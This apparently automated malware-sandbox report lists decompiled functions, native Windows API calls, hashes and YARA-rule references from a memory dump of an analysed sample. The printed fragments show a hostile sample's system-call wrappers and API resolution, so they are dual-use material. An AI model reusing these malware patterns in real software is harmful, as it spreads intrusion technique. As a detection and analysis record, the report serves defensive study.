				_t21 = NtCreateFile(_a8, _a12, _a16, _a20, _a24, _a28, _a32, _a36, _a40, _a44, _a48); // executed
				return _t21;
			}

0x00419f4f
0x00419f57
0x00419f8d
0x00419f91

APIs

NtCreateFile.NTDLL(00000060,00409CD3,?,00414B87,00409CD3,FFFFFFFF,?,?,FFFFFFFF,00409CD3,00414B87,?,00409CD3,00000060,00000000,00000000), ref: 00419F8D

Memory Dump Source

Source File: 00000003.00000002.296624622.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Yara matches

Similarity

API ID: CreateFile
String ID:
API String ID: 823142352-0
Opcode ID: 255eac8f353b7b8934ff6a71ff904c2473dc3201d920852afcf054611f931be4
Instruction ID: 8ea736774ba8911b8279b9cfd49072e0c789f2d5db859ac2b7c7e6ef757ed24e
Opcode Fuzzy Hash: 255eac8f353b7b8934ff6a71ff904c2473dc3201d920852afcf054611f931be4
Instruction Fuzzy Hash: E6F0BDB2205208ABCB08CF89DC95EEB77ADAF8C754F158248BA0D97241C630F8518BA4

Uniqueness

Uniqueness Score: -1.00%

Function 00419F3A, Relevance: 1.5, APIs: 1, Instructions: 39
filenativeCOMMON

Download Yara Rule

C-Code - Quality: 82%

			E00419F3A(void* __eax, void* __eflags, HANDLE* _a4, long _a8, struct _EXCEPTION_RECORD _a12, struct _ERESOURCE_LITE _a16, struct _GUID _a20, long _a24, long _a28, long _a32, long _a36, void* _a40, long _a44) {
				intOrPtr _v0;
				long _t22;
				void* _t32;

				do {
				} while (__eflags >= 0);
				asm("invalid");
				_t16 = _v0;
				_t3 = _t16 + 0xc40; // 0xc40
				E0041AB40(_t32, _v0, _t3,  *((intOrPtr*)(_v0 + 0x10)), 0, 0x28);
				_t22 = NtCreateFile(_a4, _a8, _a12, _a16, _a20, _a24, _a28, _a32, _a36, _a40, _a44); // executed
				return _t22;
			}

0x00419f3b
0x00419f3b
0x00419f3e
0x00419f43
0x00419f4f
0x00419f57
0x00419f8d
0x00419f91

APIs

NtCreateFile.NTDLL(00000060,00409CD3,?,00414B87,00409CD3,FFFFFFFF,?,?,FFFFFFFF,00409CD3,00414B87,?,00409CD3,00000060,00000000,00000000), ref: 00419F8D

Memory Dump Source

Source File: 00000003.00000002.296624622.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Yara matches

Similarity

API ID: CreateFile
String ID:
API String ID: 823142352-0
Opcode ID: ddb88d2d29e12db52c9d1310a7dcbc0b5a2d48d6bdd18a7550d07c738536db2d
Instruction ID: 68cdd8c840343eea8cb1369e0d17097811995b2cb39a9de5f15b765e3a7bc4ab
Opcode Fuzzy Hash: ddb88d2d29e12db52c9d1310a7dcbc0b5a2d48d6bdd18a7550d07c738536db2d
Instruction Fuzzy Hash: B4F019B2214149ABCB08DF98D894CEB77ADBF8C314B05824DFA1DA7201D634E852CBA4

Uniqueness

Uniqueness Score: -1.00%

Function 0041A120, Relevance: 1.5, APIs: 1, Instructions: 30
memorynativeCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E0041A120(intOrPtr _a4, void* _a8, PVOID* _a12, long _a16, long* _a20, long _a24, long _a28) {
				long _t14;
				void* _t21;

				_t3 = _a4 + 0xc60; // 0xca0
				E0041AB40(_t21, _a4, _t3,  *((intOrPtr*)(_a4 + 0x10)), 0, 0x30);
				_t14 = NtAllocateVirtualMemory(_a8, _a12, _a16, _a20, _a24, _a28); // executed
				return _t14;
			}

0x0041a12f
0x0041a137
0x0041a159
0x0041a15d

APIs

NtAllocateVirtualMemory.NTDLL(00003000,?,00000000,?,0041AD14,?,00000000,?,00003000,00000040,00000000,00000000,00409CD3), ref: 0041A159

Memory Dump Source

Source File: 00000003.00000002.296624622.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Yara matches

Similarity

API ID: AllocateMemoryVirtual
String ID:
API String ID: 2167126740-0
Opcode ID: b2c7a9f16f7248b886659db27fd6bc2ac43cd74a54ece53f3674161978f52f4b
Instruction ID: 41af93f0003505e3ba0015a63dd184b135cd46b9981c195137c9cf1cde5447cb
Opcode Fuzzy Hash: b2c7a9f16f7248b886659db27fd6bc2ac43cd74a54ece53f3674161978f52f4b
Instruction Fuzzy Hash: 66F015B2200208ABCB14DF89CC81EEB77ADAF88754F118149BE0997241C634F810CBA4

Uniqueness

Uniqueness Score: -1.00%

Function 0041A11B, Relevance: 1.5, APIs: 1, Instructions: 29
memorynativeCOMMON

Download Yara Rule

C-Code - Quality: 53%

			E0041A11B(void* _a4, PVOID* _a8, long _a12, long* _a16, long _a20, long _a24) {
				intOrPtr _v0;
				long _t14;
				void* _t21;

				_push(0x48);
				asm("cdq");
				asm("sbb [ebp-0x741374ab], dh");
				_t10 = _v0;
				_t3 = _t10 + 0xc60; // 0xca0
				E0041AB40(_t21, _v0, _t3,  *((intOrPtr*)(_v0 + 0x10)), 0, 0x30);
				_t14 = NtAllocateVirtualMemory(_a4, _a8, _a12, _a16, _a20, _a24); // executed
				return _t14;
			}

0x0041a11b
0x0041a11d
0x0041a11e
0x0041a123
0x0041a12f
0x0041a137
0x0041a159
0x0041a15d

APIs

NtAllocateVirtualMemory.NTDLL(00003000,?,00000000,?,0041AD14,?,00000000,?,00003000,00000040,00000000,00000000,00409CD3), ref: 0041A159

Memory Dump Source

Source File: 00000003.00000002.296624622.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Yara matches

Similarity

API ID: AllocateMemoryVirtual
String ID:
API String ID: 2167126740-0
Opcode ID: 90c0cca607f877ea3f37f883c5726b796cbd5da6fd3cba51c6e5fcb6d77f2277
Instruction ID: 0ee272aa125d2b667bc3665b19c4cc3621f4cee0070767241db2ba50f30a5ba9
Opcode Fuzzy Hash: 90c0cca607f877ea3f37f883c5726b796cbd5da6fd3cba51c6e5fcb6d77f2277
Instruction Fuzzy Hash: 85F0A7B51041495BCB14DF59DC84CD77769BF48220F14864DFA4C97102C234E414CBB0

Uniqueness

Uniqueness Score: -1.00%

Function 0041A070, Relevance: 1.5, APIs: 1, Instructions: 20
nativeCOMMON

Download Yara Rule

C-Code - Quality: 82%

			E0041A070(intOrPtr _a4, void* _a8) {
				long _t8;
				void* _t11;

				asm("in al, dx");
				_t5 = _a4;
				_t2 = _t5 + 0x10; // 0x300
				_t3 = _t5 + 0xc50; // 0x40a923
				E0041AB40(_t11, _a4, _t3,  *_t2, 0, 0x2c);
				_t8 = NtClose(_a8); // executed
				return _t8;
			}

0x0041a072
0x0041a073
0x0041a076
0x0041a07f
0x0041a087
0x0041a095
0x0041a099

APIs

NtClose.NTDLL(00414D20,?,?,00414D20,00409CD3,FFFFFFFF), ref: 0041A095

Memory Dump Source

Source File: 00000003.00000002.296624622.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Yara matches

Similarity

API ID: Close
String ID:
API String ID: 3535843008-0
Opcode ID: 462dc2fd90f57a4a7913ee6487bbcc8fe2490777b3746e68c632e34f0b64e1a4
Instruction ID: f089eca4a97aa68d4ce2a285eb3c247b66ebf33d40eb504c7b8fdb92d1b2e104
Opcode Fuzzy Hash: 462dc2fd90f57a4a7913ee6487bbcc8fe2490777b3746e68c632e34f0b64e1a4
Instruction Fuzzy Hash: 53D01776200214ABD710EB99CC85FE7BBADEF48760F154499BA199B242C534FA1086E0

Uniqueness

Uniqueness Score: -1.00%

Function 0041A072, Relevance: 1.5, APIs: 1, Instructions: 19
nativeCOMMON

Download Yara Rule

C-Code - Quality: 82%

			E0041A072() {
				long _t8;
				void* _t11;
				void* _t15;

				asm("in al, dx");
				_t5 =  *((intOrPtr*)(_t15 + 8));
				_t2 = _t5 + 0x10; // 0x300
				_t3 = _t5 + 0xc50; // 0x40a923
				E0041AB40(_t11,  *((intOrPtr*)(_t15 + 8)), _t3,  *_t2, 0, 0x2c);
				_t8 = NtClose( *(_t15 + 0xc)); // executed
				return _t8;
			}

0x0041a072
0x0041a073
0x0041a076
0x0041a07f
0x0041a087
0x0041a095
0x0041a099

APIs

NtClose.NTDLL(00414D20,?,?,00414D20,00409CD3,FFFFFFFF), ref: 0041A095

Memory Dump Source

Source File: 00000003.00000002.296624622.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Yara matches

Similarity

API ID: Close
String ID:
API String ID: 3535843008-0
Opcode ID: 4d5e2dbbd0041423f9aaaba988b541f8f48cccb66c2812eccf193562f7620ca8
Instruction ID: 38b2c2888c65efa86cbd46bf1d66059842abe041cef45209ad8de69ac2b53554
Opcode Fuzzy Hash: 4d5e2dbbd0041423f9aaaba988b541f8f48cccb66c2812eccf193562f7620ca8
Instruction Fuzzy Hash: A2D01776200210ABD710EBA8CC85FE77B69EF48360F154599BA1D9B242C534E61086A0

Uniqueness

Uniqueness Score: -1.00%

Function 01559910, Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 0155991A

Memory Dump Source

Source File: 00000003.00000002.298699245.00000000014F0000.00000040.00000001.sdmp, Offset: 014F0000, based on PE: true

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: 6e8295fe7914530ef75e01ccf90eb0f31de7cfbd3270952fe2bd33a31a4559e2
Instruction ID: 72fabaa98a27f711a9f3a7a4670387d84aa34cdd6935ee56d6341733f3fc6ec8
Opcode Fuzzy Hash: 6e8295fe7914530ef75e01ccf90eb0f31de7cfbd3270952fe2bd33a31a4559e2
Instruction Fuzzy Hash: 3A9002B134100802E140719A84047460059B7D0341F51C811A5454A54ECA998DD5B6E5

Uniqueness

Uniqueness Score: -1.00%

Function 015599A0, Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 015599AA

Memory Dump Source

Source File: 00000003.00000002.298699245.00000000014F0000.00000040.00000001.sdmp, Offset: 014F0000, based on PE: true

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: 074087665b1f7102ddbf874405db05d3bcfec833db7114565f095026ebb999a3
Instruction ID: 331b36cc2e8a72ad3fe3192d3141dcd3d588cb369c996d0d96d28b4ddcc88e81
Opcode Fuzzy Hash: 074087665b1f7102ddbf874405db05d3bcfec833db7114565f095026ebb999a3
Instruction Fuzzy Hash: B09002A138100842E100619A8414B060059F7E1341F51C815E1454A54DCA59CC52B1A6

Uniqueness

Uniqueness Score: -1.00%

Function 01559840, Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 0155984A

Memory Dump Source

Source File: 00000003.00000002.298699245.00000000014F0000.00000040.00000001.sdmp, Offset: 014F0000, based on PE: true

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: b1669533cbfe9d534c303b0528950eaad83da5860a564a177a584f7d35a0edce
Instruction ID: c8f1e6b442168caddda47972fd40e2a96a9de52775f0035f303e75a4e2e78147
Opcode Fuzzy Hash: b1669533cbfe9d534c303b0528950eaad83da5860a564a177a584f7d35a0edce
Instruction Fuzzy Hash: 06900261382045526545B19A8404507405AB7E0281791C812A1804E50CC9669856E6A1

Uniqueness

Uniqueness Score: -1.00%

Function 01559860, Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 0155986A

Memory Dump Source

Source File: 00000003.00000002.298699245.00000000014F0000.00000040.00000001.sdmp, Offset: 014F0000, based on PE: true

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: f23e2eb2c3399e9c8827d14c4694b2078cfd35e52d84544e678d19f76f4a1fcf
Instruction ID: 9cd9a700de0e7ef3a77aa90bc3d57d08765ca26f93feb7f857ff86dc782b788f
Opcode Fuzzy Hash: f23e2eb2c3399e9c8827d14c4694b2078cfd35e52d84544e678d19f76f4a1fcf
Instruction Fuzzy Hash: 5A90027134100813E111619A8504707005DB7D0281F91CC12A0814A58DDA968952F1A1

Uniqueness

Uniqueness Score: -1.00%

Function 015598F0, Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 015598FA

Memory Dump Source

Source File: 00000003.00000002.298699245.00000000014F0000.00000040.00000001.sdmp, Offset: 014F0000, based on PE: true

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: 496e1c6fed21d76bdc6d030167ca7953ef54860132a8c8780faeb45400860c80
Instruction ID: 796c721c6a91875c5ede7981514a82ad3e7c01d98d478ad596f9a98de8131e1f
Opcode Fuzzy Hash: 496e1c6fed21d76bdc6d030167ca7953ef54860132a8c8780faeb45400860c80
Instruction Fuzzy Hash: B090026174100902E101719A8404616005EB7D0281F91C822A1414A55ECE658992F1B1

Uniqueness

Uniqueness Score: -1.00%

Function 01559A50, Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 01559A5A

Memory Dump Source

Source File: 00000003.00000002.298699245.00000000014F0000.00000040.00000001.sdmp, Offset: 014F0000, based on PE: true

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: c87652060c36c7a20b61846c08849dc22b77db364f0339c2bf7150c01120f454
Instruction ID: fb42ff4a0978348df1c97d07ed93d31697b17e33f9d846ff0de86d83b962a8d8
Opcode Fuzzy Hash: c87652060c36c7a20b61846c08849dc22b77db364f0339c2bf7150c01120f454
Instruction Fuzzy Hash: C390026135180442E20065AA8C14B070059B7D0343F51C915A0544A54CCD558861A5A1

Uniqueness

Uniqueness Score: -1.00%

Function 01559A00, Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 01559A0A

Memory Dump Source

Source File: 00000003.00000002.298699245.00000000014F0000.00000040.00000001.sdmp, Offset: 014F0000, based on PE: true

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: fdcb9066a913d2ff8e8f0501d616310ed3eb058a48d7000c2c10f18a39c7ee57
Instruction ID: 0e1c76b126802ef1ac610a1c7caf6d89dd2a8f2ce6b6ee3f1249ff214ab605e5
Opcode Fuzzy Hash: fdcb9066a913d2ff8e8f0501d616310ed3eb058a48d7000c2c10f18a39c7ee57
Instruction Fuzzy Hash: 5790027134140802E100619A881470B0059B7D0342F51C811A1554A55DCA658851B5F1

Uniqueness

Uniqueness Score: -1.00%

Function 01559A20, Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 01559A2A

Memory Dump Source

Source File: 00000003.00000002.298699245.00000000014F0000.00000040.00000001.sdmp, Offset: 014F0000, based on PE: true

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: 0f490be097be6577f967306ae355c081570eabf412b661ecfbc888e2a1d4d18d
Instruction ID: 48b5135d5f2264222cec4d081fa750e2cd00f98362aae124c3e9082d2aa0960e
Opcode Fuzzy Hash: 0f490be097be6577f967306ae355c081570eabf412b661ecfbc888e2a1d4d18d
Instruction Fuzzy Hash: F690026174100442514071AAC8449064059BBE1251751C921A0D88A50DC9998865A6E5

Uniqueness

Uniqueness Score: -1.00%

Function 01559540, Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 0155954A

Memory Dump Source

Source File: 00000003.00000002.298699245.00000000014F0000.00000040.00000001.sdmp, Offset: 014F0000, based on PE: true

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: 6a1bfda5572f0766dda1e7947ec36ae11f892b49d233ed4fee021cae1753c361
Instruction ID: 1c8a149f3a22d95f1be0607248e393c84f3b101572bba65020530ac320135f6a
Opcode Fuzzy Hash: 6a1bfda5572f0766dda1e7947ec36ae11f892b49d233ed4fee021cae1753c361
Instruction Fuzzy Hash: 01900265351004031105A59A4704507009AB7D5391351C821F1405A50CDA618861A1A1

Uniqueness

Uniqueness Score: -1.00%

Function 015595D0, Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 015595DA

Memory Dump Source

Source File: 00000003.00000002.298699245.00000000014F0000.00000040.00000001.sdmp, Offset: 014F0000, based on PE: true

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: dd6c355f07200fa45d477a33fad32b40ed510c30427e94c5b309f0481c4914cf
Instruction ID: 6127f757874239db46389b99e9441f81c0d377750308fecedafd84dbb2c3c214
Opcode Fuzzy Hash: dd6c355f07200fa45d477a33fad32b40ed510c30427e94c5b309f0481c4914cf
Instruction Fuzzy Hash: 889002A1342004035105719A8414616405EB7E0241B51C821E1404A90DC9658891B1A5

Uniqueness

Uniqueness Score: -1.00%

Function 01559710, Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 0155971A

Memory Dump Source

Source File: 00000003.00000002.298699245.00000000014F0000.00000040.00000001.sdmp, Offset: 014F0000, based on PE: true

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: e7ac45b5f4ddf8f130188bcdebb439e99e46dccb3fbab059400ecbfa348dc3b7
Instruction ID: 361ce776f2dedd66087ae57a5d7d6d853a9c5ef5da27542a7f08cfd4cb094264
Opcode Fuzzy Hash: e7ac45b5f4ddf8f130188bcdebb439e99e46dccb3fbab059400ecbfa348dc3b7
Instruction Fuzzy Hash: F390027134100802E10065DA94086460059B7E0341F51D811A5414A55ECAA58891B1B1

Uniqueness

Uniqueness Score: -1.00%

Function 01559780, Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 0155978A

Memory Dump Source

Source File: 00000003.00000002.298699245.00000000014F0000.00000040.00000001.sdmp, Offset: 014F0000, based on PE: true

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: c0d056ad878c3ddb235d104157c96975137cf86b326d34db4a379c4689e17d39
Instruction ID: e3f834d5bf83fd95539ba1b63e5c41ca0ce861362261e39d5f379879c6aad535
Opcode Fuzzy Hash: c0d056ad878c3ddb235d104157c96975137cf86b326d34db4a379c4689e17d39
Instruction Fuzzy Hash: F890026935300402E180719A940860A0059B7D1242F91DC15A0405A58CCD558869A3A1

Uniqueness

Uniqueness Score: -1.00%

Function 015597A0, Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 015597AA

Memory Dump Source

Source File: 00000003.00000002.298699245.00000000014F0000.00000040.00000001.sdmp, Offset: 014F0000, based on PE: true

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: 1d82561b8e7b21e0a2ed87d7369387c5d3c8107d61c7e8b4201d73a4de280077
Instruction ID: 87535e1221bdf251edd02464fa891ac84af605127b112e1845eb49716ccfa973
Opcode Fuzzy Hash: 1d82561b8e7b21e0a2ed87d7369387c5d3c8107d61c7e8b4201d73a4de280077
Instruction Fuzzy Hash: D590026134100403E140719A94186064059F7E1341F51D811E0804A54CDD558856A2A2

Uniqueness

Uniqueness Score: -1.00%

Function 01559660, Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 0155966A

Memory Dump Source

Source File: 00000003.00000002.298699245.00000000014F0000.00000040.00000001.sdmp, Offset: 014F0000, based on PE: true

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: 58422438075747e4efa0ed2a908dfe4a5d31bb788a1aec8a6ca0c4f780242d3a
Instruction ID: 2b46397ed780aed161b7579853780bf63f2eb632e46bff4eb6878af0842eb67e
Opcode Fuzzy Hash: 58422438075747e4efa0ed2a908dfe4a5d31bb788a1aec8a6ca0c4f780242d3a
Instruction Fuzzy Hash: 4F90027134100C02E180719A840464A0059B7D1341F91C815A0415B54DCE558A59B7E1

Uniqueness

Uniqueness Score: -1.00%

Function 015596E0, Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 015596EA

Memory Dump Source

Source File: 00000003.00000002.298699245.00000000014F0000.00000040.00000001.sdmp, Offset: 014F0000, based on PE: true

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: 4cec75c6cc41aa7ceb1aa86df6be8f297b96ea4a8fa0aeb0d7385a2c118fda10
Instruction ID: 8ff75c50231ef0d422b8fc0777394c6e3164693c8f4100e12a2b7ead2a100af3
Opcode Fuzzy Hash: 4cec75c6cc41aa7ceb1aa86df6be8f297b96ea4a8fa0aeb0d7385a2c118fda10
Instruction Fuzzy Hash: 6190027134108C02E110619AC40474A0059B7D0341F55CC11A4814B58DCAD58891B1A1

Uniqueness

Uniqueness Score: -1.00%

Function 00409A90, Relevance: .1, Instructions: 92COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000003.00000002.296624622.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 85f50be950a21e862b28ca2f4812514f7b183b35d9e9e047d8ddab7a4673c6d2
Instruction ID: 824f618ac45dd5bc7e37706cae1294881ff240cb1c6ae79f8c939ae525b1ba39
Opcode Fuzzy Hash: 85f50be950a21e862b28ca2f4812514f7b183b35d9e9e047d8ddab7a4673c6d2
Instruction Fuzzy Hash: AD210CB2D4021857CB25DA65AD42BEF737CAB54318F04017FE949A3182F6387E49CBA5

Uniqueness

Uniqueness Score: -1.00%

Function 004082EB, Relevance: 1.6, APIs: 1, Instructions: 62
threadwindowCOMMON

Download Yara Rule

C-Code - Quality: 67%

			E004082EB(intOrPtr _a4, long _a8) {
				char _v67;
				char _v68;
				void* _t12;
				int _t13;
				long _t20;
				int _t25;
				void* _t28;
				void* _t30;
				void* _t35;

				asm("into");
				es = cs;
				asm("loop 0x36");
				_t28 = _t30;
				_v68 = 0;
				E0041BA40( &_v67, 0, 0x3f);
				E0041C5E0( &_v68, 3);
				_t12 = E0040ACD0(_t35, _a4 + 0x1c,  &_v68); // executed
				_t13 = E00414E20(_a4 + 0x1c, _t12, 0, 0, 0xc4e7b6d6);
				_t25 = _t13;
				if(_t25 != 0) {
					_t20 = _a8;
					_t13 = PostThreadMessageW(_t20, 0x111, 0, 0); // executed
					_t37 = _t13;
					if(_t13 == 0) {
						_t13 =  *_t25(_t20, 0x8003, _t28 + (E0040A460(_t37, 1, 8) & 0x000000ff) - 0x40, _t13);
					}
				}
				return _t13;
			}

0x004082eb
0x004082ed
0x004082ee
0x004082f1
0x004082ff
0x00408303
0x0040830e
0x0040831e
0x0040832e
0x00408333
0x0040833a
0x0040833d
0x0040834a
0x0040834c
0x0040834e
0x0040836b
0x0040836b
0x0040836d
0x00408372

APIs

PostThreadMessageW.USER32(?,00000111,00000000,00000000,?), ref: 0040834A

Memory Dump Source

Source File: 00000003.00000002.296624622.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Yara matches

Similarity

API ID: MessagePostThread
String ID:
API String ID: 1836367815-0
Opcode ID: dbe628c71d5bb4434ebd4322cc9e86c66b53b52ab6b499a9f0681b35c5e3a0b3
Instruction ID: a6ed342923345b3c414b73acc2b7c56e68cc65e80e4d3ced5754712c7c91b6b3
Opcode Fuzzy Hash: dbe628c71d5bb4434ebd4322cc9e86c66b53b52ab6b499a9f0681b35c5e3a0b3
Instruction Fuzzy Hash: 0301F93168031877E720A6959C03FFE775CAB40F14F15412EFF04BA1C1D6B9690542EA

Uniqueness

Uniqueness Score: -1.00%

Function 004082F0, Relevance: 1.6, APIs: 1, Instructions: 55
threadwindowCOMMON

Download Yara Rule

C-Code - Quality: 82%

			E004082F0(void* __eflags, intOrPtr _a4, long _a8) {
				char _v67;
				char _v68;
				void* _t12;
				intOrPtr* _t13;
				int _t14;
				long _t21;
				intOrPtr* _t25;
				void* _t26;
				void* _t30;

				_t30 = __eflags;
				_v68 = 0;
				E0041BA40( &_v67, 0, 0x3f);
				E0041C5E0( &_v68, 3);
				_t12 = E0040ACD0(_t30, _a4 + 0x1c,  &_v68); // executed
				_t13 = E00414E20(_a4 + 0x1c, _t12, 0, 0, 0xc4e7b6d6);
				_t25 = _t13;
				if(_t25 != 0) {
					_t21 = _a8;
					_t14 = PostThreadMessageW(_t21, 0x111, 0, 0); // executed
					_t32 = _t14;
					if(_t14 == 0) {
						_t14 =  *_t25(_t21, 0x8003, _t26 + (E0040A460(_t32, 1, 8) & 0x000000ff) - 0x40, _t14);
					}
					return _t14;
				}
				return _t13;
			}

0x004082f0
0x004082ff
0x00408303
0x0040830e
0x0040831e
0x0040832e
0x00408333
0x0040833a
0x0040833d
0x0040834a
0x0040834c
0x0040834e
0x0040836b
0x0040836b
0x00000000
0x0040836d
0x00408372

APIs

PostThreadMessageW.USER32(?,00000111,00000000,00000000,?), ref: 0040834A

Memory Dump Source

Source File: 00000003.00000002.296624622.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Yara matches

Similarity

API ID: MessagePostThread
String ID:
API String ID: 1836367815-0
Opcode ID: 5979eb0b3e4b2f2f99457796a9d187242cc49815797ce951ec76352a9c0a08f3
Instruction ID: 9bf814525d72d383b6bb443767b854bd285969e766b1df84f5265e4e126c9636
Opcode Fuzzy Hash: 5979eb0b3e4b2f2f99457796a9d187242cc49815797ce951ec76352a9c0a08f3
Instruction Fuzzy Hash: 2A01F731A803287BE720A6A59C03FFF772CAB40F54F04401EFF04BA1C1E6A8690546FA

Uniqueness

Uniqueness Score: -1.00%

Function 0041A3A1, Relevance: 1.6, APIs: 1, Instructions: 51COMMON

Download Yara Rule

APIs

LookupPrivilegeValueW.ADVAPI32(00000000,0000003C,0040F1A2,0040F1A2,0000003C,00000000,?,00409D45), ref: 0041A3E0

Memory Dump Source

Source File: 00000003.00000002.296624622.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Yara matches

Similarity

API ID: LookupPrivilegeValue
String ID:
API String ID: 3899507212-0
Opcode ID: 143b4b30d207f526109425fd6e39a3f9ccec5b797c0675af2046d04cbc7742c6
Instruction ID: 522588c98a427bdb6087c1f3efb9d0f18216394c39e2b1e16dcef3b5a2917000
Opcode Fuzzy Hash: 143b4b30d207f526109425fd6e39a3f9ccec5b797c0675af2046d04cbc7742c6
Instruction Fuzzy Hash: A50192B5201214BFDB20DF59CC41FEB3769EF88350F118559FA0D97282C634A824CBB5

Uniqueness

Uniqueness Score: -1.00%

Function 0041A250, Relevance: 1.5, APIs: 1, Instructions: 24
memoryCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E0041A250(intOrPtr _a4, void* _a8, long _a12, void* _a16) {
				char _t10;
				void* _t15;

				_t3 = _a4 + 0xc74; // 0xc74
				E0041AB40(_t15, _a4, _t3,  *((intOrPtr*)(_a4 + 0x10)), 0, 0x35);
				_t10 = RtlFreeHeap(_a8, _a12, _a16); // executed
				return _t10;
			}

0x0041a25f
0x0041a267
0x0041a27d
0x0041a281

APIs

RtlFreeHeap.NTDLL(00000060,00409CD3,?,?,00409CD3,00000060,00000000,00000000,?,?,00409CD3,?,00000000), ref: 0041A27D

Memory Dump Source

Source File: 00000003.00000002.296624622.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Yara matches

Similarity

API ID: FreeHeap
String ID:
API String ID: 3298025750-0
Opcode ID: c73a038728a0c461ae7389dd2c659cb336152b082840842379cc140023e4f07c
Instruction ID: ee3aa041e972e1580d2f30967c3c9a2bcee9683d3d67cd51b15d6bd94af8f81d
Opcode Fuzzy Hash: c73a038728a0c461ae7389dd2c659cb336152b082840842379cc140023e4f07c
Instruction Fuzzy Hash: BEE046B1200208ABDB18EF99CC49EE777ADEF88760F018559FE095B242C630F910CAF0

Uniqueness

Uniqueness Score: -1.00%

Function 0041A210, Relevance: 1.5, APIs: 1, Instructions: 24
memoryCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E0041A210(intOrPtr _a4, void* _a8, long _a12, long _a16) {
				void* _t10;
				void* _t15;

				E0041AB40(_t15, _a4, _a4 + 0xc70,  *((intOrPtr*)(_a4 + 0x10)), 0, 0x34);
				_t10 = RtlAllocateHeap(_a8, _a12, _a16); // executed
				return _t10;
			}

0x0041a227
0x0041a23d
0x0041a241

APIs

RtlAllocateHeap.NTDLL(00414506,?,00414C7F,00414C7F,?,00414506,?,?,?,?,?,00000000,00409CD3,?), ref: 0041A23D

Memory Dump Source

Source File: 00000003.00000002.296624622.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Yara matches

Similarity

API ID: AllocateHeap
String ID:
API String ID: 1279760036-0
Opcode ID: 5b685ba00e4f3e285a347290f69675979fbe5b3df3c61f88542a29b4b9d62cf4
Instruction ID: 447e7a220df12b1cedfda995ac5eefb5f8fdfd8f8e9865071670fb4112bd08d3
Opcode Fuzzy Hash: 5b685ba00e4f3e285a347290f69675979fbe5b3df3c61f88542a29b4b9d62cf4
Instruction Fuzzy Hash: F8E012B1200208ABDB14EF99CC41EA777ADAF88664F118559BA095B242C630F9108AB0

Uniqueness

Uniqueness Score: -1.00%

Function 0041A3B0, Relevance: 1.5, APIs: 1, Instructions: 24COMMON

Download Yara Rule

APIs

LookupPrivilegeValueW.ADVAPI32(00000000,0000003C,0040F1A2,0040F1A2,0000003C,00000000,?,00409D45), ref: 0041A3E0

Memory Dump Source

